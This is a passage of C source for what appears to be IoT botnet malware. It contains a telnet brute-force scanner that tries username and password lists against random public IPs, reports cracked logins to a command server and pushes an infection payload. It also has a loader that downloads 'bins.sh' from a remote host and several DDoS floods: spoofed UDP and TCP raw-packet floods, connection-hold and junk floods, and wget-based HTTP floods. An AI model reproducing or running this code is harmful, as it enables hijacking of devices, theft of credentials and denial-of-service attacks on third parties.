  1070. in_addr_t findARandomIP()
  1071. {
  1072. if(rangechoice < 1 || rangechoice > 5){
  1073. return getRandomPublicIP();
  1074. }else{
  1075. if(rangechoice == 1){
  1076. return getRandomPublicIP2();
  1077. }else if(rangechoice == 2){
  1078. return getRandomPublicIPA();
  1079. }else if(rangechoice == 3){
  1080. return getRandomPublicIPB();
  1081. }else if(rangechoice == 4){
  1082. return getRandomPublicIPC();
  1083. }else{
  1084. return getRandomPublicIP();
  1085. }
  1086. }
  1087. }
  1088.  
  1089. in_addr_t getRandomIP(in_addr_t netmask)
  1090. {
  1091. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
  1092. return tmp ^ ( rand_cmwc() & ~netmask);
  1093. }
  1094.  
  1095. unsigned short csum (unsigned short *buf, int count)
  1096. {
  1097. register uint64_t sum = 0;
  1098. while( count > 1 ) { sum += *buf++; count -= 2; }
  1099. if(count > 0) { sum += *(unsigned char *)buf; }
  1100. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
  1101. return (uint16_t)(~sum);
  1102. }
  1103.  
  1104. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
  1105. {
  1106.  
  1107. struct tcp_pseudo
  1108. {
  1109. unsigned long src_addr;
  1110. unsigned long dst_addr;
  1111. unsigned char zero;
  1112. unsigned char proto;
  1113. unsigned short length;
  1114. } pseudohead;
  1115. unsigned short total_len = iph->tot_len;
  1116. pseudohead.src_addr=iph->saddr;
  1117. pseudohead.dst_addr=iph->daddr;
  1118. pseudohead.zero=0;
  1119. pseudohead.proto=IPPROTO_TCP;
  1120. pseudohead.length=htons(sizeof(struct tcphdr));
  1121. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
  1122. unsigned short *tcp = malloc(totaltcp_len);
  1123. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
  1124. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
  1125. unsigned short output = csum(tcp,totaltcp_len);
  1126. free(tcp);
  1127. return output;
  1128. }
  1129.  
  1130. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
  1131. {
  1132. iph->ihl = 5;
  1133. iph->version = 4;
  1134. iph->tos = 0;
  1135. iph->tot_len = sizeof(struct iphdr) + packetSize;
  1136. iph->id = rand_cmwc();
  1137. iph->frag_off = 0;
  1138. iph->ttl = MAXTTL;
  1139. iph->protocol = protocol;
  1140. iph->check = 0;
  1141. iph->saddr = source;
  1142. iph->daddr = dest;
  1143. }
  1144.  
  1145. int sclose(int fd)
  1146. {
  1147. if(3 > fd) return 1;
  1148. close(fd);
  1149. return 0;
  1150. }
  1151. int socket_connect(char *host, in_port_t port) {
  1152. struct hostent *hp;
  1153. struct sockaddr_in addr;
  1154. int on = 1, sock;
  1155. if ((hp = gethostbyname(host)) == NULL) return 0;
  1156. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  1157. addr.sin_port = htons(port);
  1158. addr.sin_family = AF_INET;
  1159. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  1160. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  1161. if (sock == -1) return 0;
  1162. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  1163. return sock;
  1164. }
  1165.  
  1166. void echoLoader()
  1167. {
  1168. char buffer[BUFFER_SIZE];
  1169. int fd;
  1170. fd = socket_connect("ip", 80);
  1171. write(fd, "GET bins.sh\r\n", strlen("GET bins.sh\r\n")); // write(fd, char[]*, len);
  1172. bzero(buffer, BUFFER_SIZE);
  1173.  
  1174. while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
  1175. FILE *f;
  1176. f = fopen("x", "a");
  1177. fprintf(f, "%s", buffer);
  1178. fclose(f);
  1179. bzero(buffer, BUFFER_SIZE);
  1180. }
  1181.  
  1182. shutdown(fd, SHUT_RDWR);
  1183. close(fd);
  1184. }
  1185.  
  1186. void StartTheLelz(int wait_usec, int maxfds)
  1187. {
  1188. int i, res, num_tmps, j;
  1189. char buf[128], cur_dir;
  1190.  
  1191. int max = maxfds;
  1192. fd_set fdset;
  1193. struct timeval tv;
  1194. socklen_t lon;
  1195. int valopt;
  1196.  
  1197. srand(time(NULL) ^ rand_cmwc());
  1198.  
  1199. char line[256];
  1200. char* buffer;
  1201. struct sockaddr_in dest_addr;
  1202. dest_addr.sin_family = AF_INET;
  1203. dest_addr.sin_port = htons(23);
  1204. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1205.  
  1206. buffer = malloc(BUFFER_SIZE + 1);
  1207. memset(buffer, 0, BUFFER_SIZE + 1);
  1208.  
  1209. struct telstate_t fds[max];
  1210.  
  1211.  
  1212. memset(fds, 0, max * (sizeof(int) + 1));
  1213. for(i = 0; i < max; i++)
  1214. {
  1215. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1216. fds[i].complete = 1;
  1217. fds[i].sockbuf = buffer;
  1218. }
  1219. for(num_tmps = 0; tmpdirs[++num_tmps] != 0; );
  1220.  
  1221.  
  1222.  
  1223. while(1)
  1224. {
  1225. for(i = 0; i < max; i++)
  1226. {
  1227. if(fds[i].totalTimeout == 0)
  1228. {
  1229. fds[i].totalTimeout = time(NULL);
  1230. }
  1231.  
  1232. switch(fds[i].state)
  1233. {
  1234. case 0:
  1235. {
  1236. if(fds[i].complete == 1)
  1237. {
  1238. // clear the current fd
  1239. char *tmp = fds[i].sockbuf;
  1240. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1241. fds[i].sockbuf = tmp;
  1242. // get a new random ip
  1243. fds[i].ip = findARandomIP();
  1244. }
  1245. else if(fds[i].complete == 0)
  1246. {
  1247. fds[i].passwordInd++;
  1248. fds[i].usernameInd++;
  1249.  
  1250. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *))
  1251. {
  1252. fds[i].complete = 1;
  1253. continue;
  1254. }
  1255. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *))
  1256. {
  1257. fds[i].complete = 1;
  1258. continue;
  1259. }
  1260. }
  1261.  
  1262. dest_addr.sin_family = AF_INET;
  1263. dest_addr.sin_port = htons(23);
  1264. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1265. dest_addr.sin_addr.s_addr = fds[i].ip;
  1266.  
  1267. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1268.  
  1269. if(fds[i].fd == -1) continue;
  1270.  
  1271. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1272.  
  1273. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  1274. {
  1275. reset_telstate(&fds[i]);
  1276. }
  1277. else
  1278. {
  1279. advance_state(&fds[i], 1);
  1280. }
  1281. }
  1282. break;
  1283.  
  1284. case 1:
  1285. {
  1286. FD_ZERO(&fdset);
  1287. FD_SET(fds[i].fd, &fdset);
  1288. tv.tv_sec = 0;
  1289. tv.tv_usec = wait_usec;
  1290. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1291.  
  1292. if(res == 1)
  1293. {
  1294. lon = sizeof(int);
  1295. valopt = 0;
  1296. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1297. //printf("%d\n",valopt);
  1298. if(valopt)
  1299. {
  1300. reset_telstate(&fds[i]);
  1301. }
  1302. else
  1303. {
  1304. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1305. advance_state(&fds[i], 2);
  1306. }
  1307. continue;
  1308. }
  1309. else if(res == -1)
  1310. {
  1311. reset_telstate(&fds[i]);
  1312. continue;
  1313. }
  1314.  
  1315. if(fds[i].totalTimeout + 6 < time(NULL))
  1316. {
  1317. reset_telstate(&fds[i]);
  1318. }
  1319. }
  1320. break;
  1321.  
  1322. case 2:
  1323. {
  1324. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances))
  1325. {
  1326. if(contains_fail(fds[i].sockbuf))
  1327. {
  1328. advance_state(&fds[i], 0);
  1329. }
  1330. else
  1331. {
  1332. advance_state(&fds[i], 3);
  1333. }
  1334.  
  1335. continue;
  1336. }
  1337.  
  1338. if(fds[i].totalTimeout + 6 < time(NULL))
  1339. {
  1340. reset_telstate(&fds[i]);
  1341. }
  1342. }
  1343. break;
  1344.  
  1345. case 3:
  1346. {
  1347. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  1348. {
  1349. reset_telstate(&fds[i]);
  1350. continue;
  1351. }
  1352.  
  1353. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1354. {
  1355. reset_telstate(&fds[i]);
  1356. continue;
  1357. }
  1358.  
  1359. advance_state(&fds[i], 4);
  1360. }
  1361. break;
  1362.  
  1363. case 4:
  1364. {
  1365. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances))
  1366. {
  1367. if(contains_fail(fds[i].sockbuf))
  1368. {
  1369. advance_state(&fds[i], 0);
  1370. }
  1371. else
  1372. {
  1373. advance_state(&fds[i], 5);
  1374. }
  1375. continue;
  1376. }
  1377.  
  1378. if(fds[i].totalTimeout + 6 < time(NULL))
  1379. {
  1380. reset_telstate(&fds[i]);
  1381. }
  1382. }
  1383. break;
  1384.  
  1385. case 5:
  1386. {
  1387. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  1388. {
  1389. reset_telstate(&fds[i]);
  1390. continue;
  1391. }
  1392.  
  1393. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1394. {
  1395. reset_telstate(&fds[i]);
  1396. continue;
  1397. }
  1398.  
  1399. advance_state(&fds[i], 6);
  1400. }
  1401. break;
  1402.  
  1403. case 6:
  1404. {
  1405. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2))
  1406. {
  1407. fds[i].totalTimeout = time(NULL);
  1408.  
  1409. if(contains_fail(fds[i].sockbuf))
  1410. {
  1411. advance_state(&fds[i], 0);
  1412. }
  1413. else if(contains_success(fds[i].sockbuf))
  1414. {
  1415. if(fds[i].complete == 2)
  1416. {
  1417. advance_state(&fds[i], 7);
  1418. }
  1419. else
  1420. {
  1421. sockprintf(mainCommSock, "HIT THAT SHIT - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1422. sockprintf(mainCommSock, "YOU A BITCH %s|%s|%s|23", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1423. advance_state(&fds[i], 7);
  1424. }
  1425. }
  1426. else
  1427. {
  1428. reset_telstate(&fds[i]);
  1429. }
  1430. continue;
  1431. }
  1432.  
  1433.  
  1434. if(fds[i].totalTimeout + 7 < time(NULL))
  1435. {
  1436. reset_telstate(&fds[i]);
  1437. }
  1438. }
  1439. break;
  1440. case 7:
  1441. {
  1442. for(j = 0; j < num_tmps; j++)
  1443. {
  1444. memset(buf, 0, 128);
  1445. if(j == 0)
  1446. snprintf(buf, 127, ">%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j], tmpdirs[j]);
  1447. else
  1448. snprintf(buf, 127, ">%s.t && cd %s ; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j]);
  1449.  
  1450. if(send(fds[i].fd, buf, strlen(buf), MSG_NOSIGNAL) < 0)
  1451. {
  1452. reset_telstate(&fds[i]);
  1453. continue;
  1454. }
  1455. }
  1456. advance_state(&fds[i], 8);
  1457. }
  1458. break;
  1459. case 8:
  1460. {
  1461. fds[i].totalTimeout = time(NULL);
  1462. if(send(fds[i].fd, infect, strlen(infect), MSG_NOSIGNAL) < 0)
  1463. {
  1464. sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1465. reset_telstate(&fds[i]);
  1466. continue;
  1467. }
  1468. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, infected))
  1469. {
  1470. if(strcasestr(fds[i].sockbuf, infectedmessage) && fds[i].complete != 3)
  1471. {
  1472. sockprintf(mainCommSock, "LIKE A CHAMP - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1473. sockprintf(mainCommSock, "Telnet\'d %s|%s|%s|23", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1474. fds[i].complete = 3;
  1475. }
  1476. }
  1477. if(fds[i].totalTimeout + 300 < time(NULL))
  1478. {
  1479. if(fds[i].complete !=3){
  1480. sockprintf(mainCommSock, "FAILED TO INFECT - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1481. }
  1482. reset_telstate(&fds[i]);
  1483. }
  1484. break;
  1485. }
  1486. }
  1487. }
  1488. }
  1489. }
  1490.  
  1491. void SendSTD(unsigned char *ip, int port, int secs) {
  1492. int iSTD_Sock;
  1493. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  1494. time_t start = time(NULL);
  1495. struct sockaddr_in sin;
  1496. struct hostent *hp;
  1497. hp = gethostbyname(ip);
  1498. bzero((char*) &sin,sizeof(sin));
  1499. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  1500. sin.sin_family = hp->h_addrtype;
  1501. sin.sin_port = port;
  1502. unsigned int a = 0;
  1503. while(1){
  1504. if (a >= 50) {
  1505. send(iSTD_Sock, "std", 69, 0);
  1506. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  1507. if (time(NULL) >= start + secs) {
  1508. close(iSTD_Sock);
  1509. _exit(0);
  1510. }
  1511. a = 0;
  1512. }
  1513. a++;
  1514. }
  1515. }
  1516.  
  1517. void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
  1518. struct sockaddr_in dest_addr;
  1519. dest_addr.sin_family = AF_INET;
  1520. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1521. else dest_addr.sin_port = htons(port);
  1522. if(getHost(target, &dest_addr.sin_addr)) return;
  1523. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1524. register unsigned int pollRegister;
  1525. pollRegister = pollinterval;
  1526. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  1527. if(!sockfd) {
  1528. return;
  1529. }
  1530. int tmp = 1;
  1531. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
  1532. return;
  1533. }
  1534. int counter = 50;
  1535. while(counter--) {
  1536. srand(time(NULL) ^ rand_cmwc());
  1537. init_rand(rand());
  1538. }
  1539. in_addr_t netmask;
  1540. netmask = ( ~((1 << (32 - spoofit)) - 1) );
  1541. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
  1542. struct iphdr *iph = (struct iphdr *)packet;
  1543. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  1544. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
  1545. udph->len = htons(sizeof(struct udphdr) + packetsize);
  1546. udph->source = rand_cmwc();
  1547. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1548. udph->check = 0;
  1549. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
  1550. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1551. int end = time(NULL) + timeEnd;
  1552. register unsigned int i = 0;
  1553. while(1) {
  1554. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1555. udph->source = rand_cmwc();
  1556. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1557. iph->id = rand_cmwc();
  1558. iph->saddr = htonl( getRandomIP(netmask) );
  1559. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1560. if(i == pollRegister) {
  1561. if(time(NULL) > end) break;
  1562. i = 0;
  1563. continue;
  1564. }
  1565. i++;
  1566. }
  1567. }
  1568. void spoofTest(unsigned char *target, int port)
  1569. {
  1570. struct sockaddr_in dest_addr;
  1571.  
  1572. dest_addr.sin_family = AF_INET;
  1573. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1574. else dest_addr.sin_port = htons(port);
  1575. if(getHost(target, &dest_addr.sin_addr)) return;
  1576. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1577.  
  1578.  
  1579. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  1580. if(!sockfd)
  1581. {
  1582. sockprintf(mainCommSock, "Failed opening raw socket.");
  1583. return;
  1584. }
  1585.  
  1586. int tmp = 1;
  1587. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  1588. {
  1589. sockprintf(mainCommSock, "Failed setting raw headers mode.");
  1590. return;
  1591. }
  1592.  
  1593. int counter = 50;
  1594. while(counter--)
  1595. {
  1596. srand(time(NULL) ^ rand_cmwc());
  1597. init_rand(rand());
  1598. }
  1599.  
  1600. in_addr_t netmask;
  1601.  
  1602. netmask = ( ~((in_addr_t) -1) );
  1603.  
  1604. char *test = "";
  1605. szprintf(test,"%s",inet_ntoa(ourPublicIP));
  1606.  
  1607. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + strlen(test)];
  1608. struct iphdr *iph = (struct iphdr *)packet;
  1609. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  1610.  
  1611. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + strlen(test));
  1612.  
  1613. udph->len = htons(sizeof(struct udphdr) + strlen(test));
  1614. udph->source = rand_cmwc();
  1615. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1616. udph->check = 0;
  1617.  
  1618. szprintf((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), "%s", test);
  1619.  
  1620. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1621.  
  1622. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1623. }
  1624.  
  1625. void sendHOLD(unsigned char *ip, int port, int end_time)
  1626. {
  1627.  
  1628. int max = getdtablesize() / 2, i;
  1629.  
  1630. struct sockaddr_in dest_addr;
  1631. dest_addr.sin_family = AF_INET;
  1632. dest_addr.sin_port = htons(port);
  1633. if(getHost(ip, &dest_addr.sin_addr)) return;
  1634. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1635.  
  1636. struct state_t
  1637. {
  1638. int fd;
  1639. uint8_t state;
  1640. } fds[max];
  1641. memset(fds, 0, max * (sizeof(int) + 1));
  1642.  
  1643. fd_set myset;
  1644. struct timeval tv;
  1645. socklen_t lon;
  1646. int valopt, res;
  1647.  
  1648. unsigned char *watwat = malloc(1024);
  1649. memset(watwat, 0, 1024);
  1650.  
  1651. int end = time(NULL) + end_time;
  1652. while(end > time(NULL))
  1653. {
  1654. for(i = 0; i < max; i++)
  1655. {
  1656. switch(fds[i].state)
  1657. {
  1658. case 0:
  1659. {
  1660. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1661. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1662. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
  1663. else fds[i].state = 1;
  1664. }
  1665. break;
  1666.  
  1667. case 1:
  1668. {
  1669. FD_ZERO(&myset);
  1670. FD_SET(fds[i].fd, &myset);
  1671. tv.tv_sec = 0;
  1672. tv.tv_usec = 10000;
  1673. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
  1674. if(res == 1)
  1675. {
  1676. lon = sizeof(int);
  1677. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1678. if(valopt)
  1679. {
  1680. close(fds[i].fd);
  1681. fds[i].state = 0;
  1682. } else {
  1683. fds[i].state = 2;
  1684. }
  1685. } else if(res == -1)
  1686. {
  1687. close(fds[i].fd);
  1688. fds[i].state = 0;
  1689. }
  1690. }
  1691. break;
  1692.  
  1693. case 2:
  1694. {
  1695. FD_ZERO(&myset);
  1696. FD_SET(fds[i].fd, &myset);
  1697. tv.tv_sec = 0;
  1698. tv.tv_usec = 10000;
  1699. res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);
  1700. if(res != 0)
  1701. {
  1702. close(fds[i].fd);
  1703. fds[i].state = 0;
  1704. }
  1705. }
  1706. break;
  1707. }
  1708. }
  1709. }
  1710. }
  1711.  
  1712. void sendJUNK(unsigned char *ip, int port, int end_time)
  1713. {
  1714.  
  1715. int max = getdtablesize() / 2, i;
  1716.  
  1717. struct sockaddr_in dest_addr;
  1718. dest_addr.sin_family = AF_INET;
  1719. dest_addr.sin_port = htons(port);
  1720. if(getHost(ip, &dest_addr.sin_addr)) return;
  1721. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1722.  
  1723. struct state_t
  1724. {
  1725. int fd;
  1726. uint8_t state;
  1727. } fds[max];
  1728. memset(fds, 0, max * (sizeof(int) + 1));
  1729.  
  1730. fd_set myset;
  1731. struct timeval tv;
  1732. socklen_t lon;
  1733. int valopt, res;
  1734.  
  1735. unsigned char *watwat = malloc(1024);
  1736. memset(watwat, 0, 1024);
  1737.  
  1738. int end = time(NULL) + end_time;
  1739. while(end > time(NULL))
  1740. {
  1741. for(i = 0; i < max; i++)
  1742. {
  1743. switch(fds[i].state)
  1744. {
  1745. case 0:
  1746. {
  1747. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1748. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1749. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
  1750. else fds[i].state = 1;
  1751. }
  1752. break;
  1753.  
  1754. case 1:
  1755. {
  1756. FD_ZERO(&myset);
  1757. FD_SET(fds[i].fd, &myset);
  1758. tv.tv_sec = 0;
  1759. tv.tv_usec = 10000;
  1760. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
  1761. if(res == 1)
  1762. {
  1763. lon = sizeof(int);
  1764. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1765. if(valopt)
  1766. {
  1767. close(fds[i].fd);
  1768. fds[i].state = 0;
  1769. } else {
  1770. fds[i].state = 2;
  1771. }
  1772. } else if(res == -1)
  1773. {
  1774. close(fds[i].fd);
  1775. fds[i].state = 0;
  1776. }
  1777. }
  1778. break;
  1779.  
  1780. case 2:
  1781. {
  1782. makeRandomStr(watwat, 1024);
  1783. if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
  1784. {
  1785. close(fds[i].fd);
  1786. fds[i].state = 0;
  1787. }
  1788. }
  1789. break;
  1790. }
  1791. }
  1792. }
  1793. }
  1794.  
  1795. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
  1796. {
  1797. register unsigned int pollRegister;
  1798. pollRegister = pollinterval;
  1799.  
  1800. struct sockaddr_in dest_addr;
  1801.  
  1802. dest_addr.sin_family = AF_INET;
  1803. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1804. else dest_addr.sin_port = htons(port);
  1805. if(getHost(target, &dest_addr.sin_addr)) return;
  1806. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1807.  
  1808. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  1809. if(!sockfd)
  1810. {
  1811. sockprintf(mainCommSock, "Failed opening raw socket.");
  1812. return;
  1813. }
  1814.  
  1815. int tmp = 1;
  1816. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  1817. {
  1818. sockprintf(mainCommSock, "Failed setting raw headers mode.");
  1819. return;
  1820. }
  1821.  
  1822. in_addr_t netmask;
  1823.  
  1824. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  1825. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  1826.  
  1827. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
  1828. struct iphdr *iph = (struct iphdr *)packet;
  1829. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  1830.  
  1831. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
  1832.  
  1833. tcph->source = rand_cmwc();
  1834. tcph->seq = rand_cmwc();
  1835. tcph->ack_seq = 0;
  1836. tcph->doff = 5;
  1837.  
  1838. if(!strcmp(flags, "all"))
  1839. {
  1840. tcph->syn = 1;
  1841. tcph->rst = 1;
  1842. tcph->fin = 1;
  1843. tcph->ack = 1;
  1844. tcph->psh = 1;
  1845. } else {
  1846. unsigned char *pch = strtok(flags, ",");
  1847. while(pch)
  1848. {
  1849. if(!strcmp(pch, "syn"))
  1850. {
  1851. tcph->syn = 1;
  1852. } else if(!strcmp(pch, "rst"))
  1853. {
  1854. tcph->rst = 1;
  1855. } else if(!strcmp(pch, "fin"))
  1856. {
  1857. tcph->fin = 1;
  1858. } else if(!strcmp(pch, "ack"))
  1859. {
  1860. tcph->ack = 1;
  1861. } else if(!strcmp(pch, "psh"))
  1862. {
  1863. tcph->psh = 1;
  1864. } else {
  1865. sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
  1866. }
  1867. pch = strtok(NULL, ",");
  1868. }
  1869. }
  1870.  
  1871. tcph->window = rand_cmwc();
  1872. tcph->check = 0;
  1873. tcph->urg_ptr = 0;
  1874. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
  1875. tcph->check = tcpcsum(iph, tcph);
  1876.  
  1877. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1878.  
  1879. int end = time(NULL) + timeEnd;
  1880. register unsigned int i = 0;
  1881. while(1)
  1882. {
  1883. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1884.  
  1885. iph->saddr = htonl( getRandomIP(netmask) );
  1886. iph->id = rand_cmwc();
  1887. tcph->seq = rand_cmwc();
  1888. tcph->source = rand_cmwc();
  1889. tcph->check = 0;
  1890. tcph->check = tcpcsum(iph, tcph);
  1891. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  1892.  
  1893. if(i == pollRegister)
  1894. {
  1895. if(time(NULL) > end) break;
  1896. i = 0;
  1897. continue;
  1898. }
  1899. i++;
  1900. }
  1901. }
  1902.  
  1903. void sendHTTP(unsigned char *url, int end_time, int sleepcheck, int sleeptime)
  1904. {
  1905. int end = time(NULL) + end_time;
  1906. FILE *pf;
  1907. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  1908.  
  1909. char *command[80];
  1910. sprintf(command,"wget -s -U \"");
  1911. strcat(command, UA);
  1912. strcat(command,"\" -q ");
  1913. strcat(command, url);
  1914. unsigned int ii = 0;
  1915.  
  1916. while(end > time(NULL))
  1917. {
  1918. UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  1919. sprintf(command,"wget -s -U \"");
  1920. strcat(command, UA);
  1921. strcat(command,"\" -q ");
  1922. strcat(command, url);
  1923. system(command);
  1924.  
  1925. if(ii == sleepcheck)
  1926. {
  1927. usleep(sleeptime*1000);
  1928. ii = 0;
  1929. continue;
  1930. }
  1931. ii++;
  1932. }
  1933.  
  1934. }
  1935.  
  1936. void sendHTTP2(unsigned char *url, int end_time, int sleepcheck, int sleeptime)
  1937. {
  1938. int end = time(NULL) + end_time;
  1939. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  1940.  
  1941.  
  1942. char *command[80];
  1943. sprintf(command,"wget -O /tmp/yuagwduiagwdhg/a -U \"");
  1944. strcat(command, UA);
  1945. strcat(command,"\" -q ");
  1946. strcat(command, url);
  1947. unsigned int ii = 0;
  1948.  
  1949. while(end > time(NULL))
  1950. {
  1951. UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  1952. sprintf(command,"wget -O /tmp/yuagwduiagwdhg/a -U \"");
  1953. strcat(command, UA);
  1954. strcat(command,"\" -q ");
  1955. strcat(command, url);
  1956. system(command);
  1957.  
  1958. if(ii == sleepcheck)
  1959. {
  1960. usleep(sleeptime*1000);
  1961. ii = 0;
  1962. continue;
  1963. }
  1964. ii++;
  1965. }
  1966.  
  1967. }
  1968.  
  1969. void sendCNC(unsigned char *ip,int port, int end_time)
  1970. {
  1971. int end = time(NULL) + end_time;
  1972. int sockfd;
  1973. struct sockaddr_in server;
  1974. //sockfd = socket(AF_INET, SOCK_STREAM, 0);
  1975.  
